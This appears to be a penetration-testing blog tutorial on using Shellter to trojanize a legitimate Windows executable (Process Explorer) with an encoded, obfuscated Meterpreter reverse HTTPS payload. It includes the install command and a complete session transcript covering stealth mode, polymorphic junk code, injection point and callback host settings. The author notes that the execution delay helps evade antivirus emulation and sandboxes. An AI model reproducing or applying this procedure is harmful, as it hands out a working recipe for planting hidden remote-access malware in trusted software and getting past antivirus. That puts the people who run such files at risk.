in

How to Backdoor Portable Executables with Shellter

Backdooring Executables

Backdooring Legitimate Applications with Payloads | Shellter

This article will cover the topic of backdooring known, legitimate executable applications (e.g the Windows Calculator) with a metasploit (or generic) executable payload. The payload is run either on the application being opened or upon an event being triggered (e.g a button press).

Background

Shellter provides two modes –

  • The automatic mode provides a fully automatic injection of the payload (which gets created in the tool itself). 
  • The manual mode gives you full control over each step in the process of creating your tiny legitimate looking file as I tested with ProcessExplorer.exe.

For those looking for a quick alternative to the backdoor-factory, Shellter seems to do a much better job of keeping the patched file fully functional.

Shellter Key Points
Some important points to mention would be –

  • Shellter V (v5.0) introduces the Stealth Mode feature which preserves the original functionality of the application while it keeps all the benefits of dynamic PE infection.
  • When you use the Stealth Mode feature you need to set the payload exit function to “Thread”, when you prepare the multi-handler listener in Metasploit, otherwise the process will be terminated when you kill the session.
  • If you don`t use the Stealth Mode feature, then if the exit function is set to “Process”, the payload will kill the process, otherwise the program will most probably crash. Keep in mind that this will happen after the execution of the payload, or after killing the reverse connection, so in any case this doesn`t affect the effectiveness of the injected code.
  • Normally, payload execution happens instantly, unless you have injected into a point in the execution flow that requires user interaction with the application in order to be reached.
  • When junk polymorphic code is used then this delays the execution of the payload. In Stealth Mode the delay is not significant. When Stealth Mode is not used the execution of the payload can be delayed by several seconds.
  • This delay can be beneficial in order to help bypass AV emulation engines and sandboxes that normally only monitor the process for a limited time. 

 To install Shellter in Debian Linux –
apt-get install shellter

Or you could use Wine to run the Windows version. However, I installed it via apt-get and I got version 4.0. The functionality in this version is not guaranteed. On this basis I would recommend running it with Wine.

Full execution of shellter from start to finish is documented below –

[email protected]:~/Downloads/shellter# wine shellter.exe 

Choose Operation Mode - Auto/Manual (A/M/H): m
PE Target: /root/Bad Exe/procexp.exe   
**********
* Backup *
**********
Backup: /root/Bad Exe/procexp.exe.bak
********************************
* PE Compatibility Information *
********************************

Minimum Supported Windows OS: 5.1

******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.
Status: All related information has been eliminated!
Gather Dynamic Thread Context Info? (Y/N/H): y
Number of Instructions: 5
Check for SelfModifying Code while Tracing? (Y/N/H): y
Pause Tracing at SelfModifying Code Detection? (Y/N/H): y
Trace All Threads? (Y/N/H): y
Show Real-Time Tracing? (Y/N/H): y
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
Note: Pressing CTRL+C when not in tracing mode will terminate Shellter.
DisASM.dll was created successfully!

49516e call 0049FF6Fh   <0>
49ff6f push ebp   <1>
49ff70 mov ebp, esp   <2>
49ff72 sub esp, 14h   <3>
49ff75 and dword ptr [ebp-0Ch], 00000000h   <4>

Tracing has been completed successfully!
Tracing Time Approx: 0.0254 mins.
Starting First Stage Filtering...
*************************
* First Stage Filtering *
*************************
Filtering Time Approx: 0.0004 mins.
Enable Stealth Mode? (Y/N/H): y
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP
[2] Meterpreter_Reverse_HTTP
[3] Meterpreter_Reverse_HTTPS
[4] Meterpreter_Bind_TCP
[5] Shell_Reverse_TCP
[6] Shell_Bind_TCP
[7] WinExec

Use a listed payload or custom? (L/C/H): l
Select payload by index: 3
*****************************
* meterpreter_reverse_https *
*****************************
SET LHOST: 192.168.1.102
SET LPORT: 443
Encode Payload using DTCK? (Y/N/H): y
Obfuscate Shellter's Decoder? (Y/N/H): y
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!
***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic code, and binding it with the payload.
Please wait...
Binding: Done!
*********************
* IAT Handler Stage *
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
0. VirtualAlloc --> IAT[4af290]
1. VirtualAllocEx --> N/A
2. VirtualProtect --> N/A
3. VirtualProtectEx --> N/A
4. HeapCreate/HeapAlloc --> N/A
5. LoadLibrary/GetProcAddress --> IAT[4af2c8]/IAT[4af49c]
6. CreateFileMapping/MapViewOfFile --> IAT[4af440]/IAT[4af454]

Choose one of the available methods: 0
****************
* Payload Info *
****************
Payload: meterpreter_reverse_https
Size: 1560 bytes
Reflective Loader: NO
Encoded-Payload Handling: Enabled
Handler Type: IAT
Obfuscate IAT Handler? (Y/N/H): y
***************************
* IAT Handler Obfuscation *
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Code Generation Time Approx: 0.275 mins.
Prepend PolyMorphic Code? (Y/N/H): Y
Prepend User/Engine PolyMorphic Code (U/E/H): e
Size of PolyCode (Approx): 512
*************************
* PolyMorphic Junk Code *
*************************
Type: Engine
Generating: ~512 bytes of PolyMorphic Junk Code
Generated: 513 bytes
Code Generation Time Approx: 0.322 mins.
Starting Second Stage Filtering...
**************************
* Second Stage Filtering *
**************************
Filtering Time Approx: 0.000367 mins.
Starting third stage filtering...
*************************
* Third Stage Filtering *
*************************
Filtering Time Approx: 0.000383 mins.
Show Disassembled Entries? (Y/N/H): n
Total Entries: 5
Valid Index Values: 0 - 4
Select <Index> of VA to Start Injection: 3
*******************
* Injection Stage *
*******************
Virtual Address: 0x49ff72
File Offset: 0x9f372
Section: .text
Adjusting stub pointers to IAT...
Done!
Adjusting Call Instructions Relative Pointers...
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
Status: Valid PE Checksum has been set!
Original Checksum: 0x26c7a8
Computed Checksum: 0x26dde6
**********************
* Verification Stage *
**********************
Info: Shellter will verify that the first instruction of the
      injected code will be reached successfully.
      If polymorphic code has been added, then the first
      instruction refers to that and not to the effective
      payload.
      Max waiting time: 10 seconds.
 Warning!
 If the PE target spawns a child process of itself before
 reaching the injection point, then the injected code will
 be executed in that process. In that case Shellter won't 
 have any control over it during this test.
 You know what you are doing, right? ;o)
Injection: Verified!
Press [Enter] to continue...
[email protected]:~/Downloads/shellter#

The backdoored application generated above was tested against Windows 7 Ultimate, Windows 8.1 Pro (Quihoo AntiVirus) and Windows 10 Pro (Windows Defender). Windows 7 had an issue with executing the patched file (I suspect it may be the version of .NET installed). As can be seen above, the tool gives quite precise control over how and where payloads can be planted in the portable executable format.

netcat cheatsheet

NetCat CheatSheet for Pentesters

XSS Turgen

XSS Decomposed – Community Project